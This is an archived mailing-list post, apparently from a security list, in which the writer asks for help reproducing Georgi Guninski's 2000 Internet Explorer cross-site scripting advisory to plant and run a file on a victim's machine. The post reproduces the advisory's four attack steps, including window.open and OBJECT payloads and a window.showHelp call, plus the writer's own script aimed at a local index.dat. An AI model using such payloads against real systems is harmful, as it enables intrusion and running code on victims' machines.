HI All,
I am testing Cross-Site Scripting to Inject and run malicious code. I was
following Georgi Guninski’s Advisory, which was published on Date: 23 November
2000.
Following this advisory, I am trying to inject some malicious file at victim’s
machine & then to run that injected file.
According to this advisory we have to perform following four steps to Inject
some file & Run that file.
1) inject JavaScript in “Index.dat” by
window.open("http://somehost/index.html?>JSCODE</SCRIPT>") The
JavaScript is executed in index.dat and has access to its content, which allow
to find the random directory names
2) parse/render index.dat by: <OBJECT DATA="file://C:/WINDOWS/Temporary
Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
HEIGHT=200></OBJECT>
3) After the Temporary internet Files Folders are known inject for example chm
files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");
I am clear up to the second step he has specified, but I am not clear with the
third and fourth stage. The third stage is going to inject chm1.chm file at
the victim’s machine, but it is not clear whether this file is situated at
victim’s machine or attacker’s machine? Also where this file will be stored at
victim’s machine? This step also doesn’t use the name of random directories we
have found in the 2nd step so I don’t know why the second step is required &
how we can write Java script to find random folders from the “Index.dat” file?
The code for injecting Java Script into Index.dat & displaying content of the
index.dat file is given as:
<SCRIPT>
b=window.open("http://10.10.10.10?>a=window.open();a.document.body.inne
rHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet
Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
setTimeout("document.writeln(s)",10000);
</SCRIPT>
This code should return output of file index.dat in to new blank window but
when I tried this I didn’t get output of index.dat file into new window,
instead I got output of index.dat in the same window in which I had written
this code.
I think to run Java Script, stored into index.dat file, first there is need to
create a object that captures all the contents of the index.dat file and then
we should create a new window & assign its “Inner HTML Code” to the contents
of the object created. I don’t know whether it make sense or not. But I am
trying to do something like that.
Any Help on the above topics will be highly appreciated.
Thanking You,
Sincerely,
Indian Tiger, CISSP
--------------------------------------------------------------
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization.
--------------------------------------------------------------
This archive was generated by hypermail 2b30 : Sat Apr 12 2003 - 13:26:29 PDT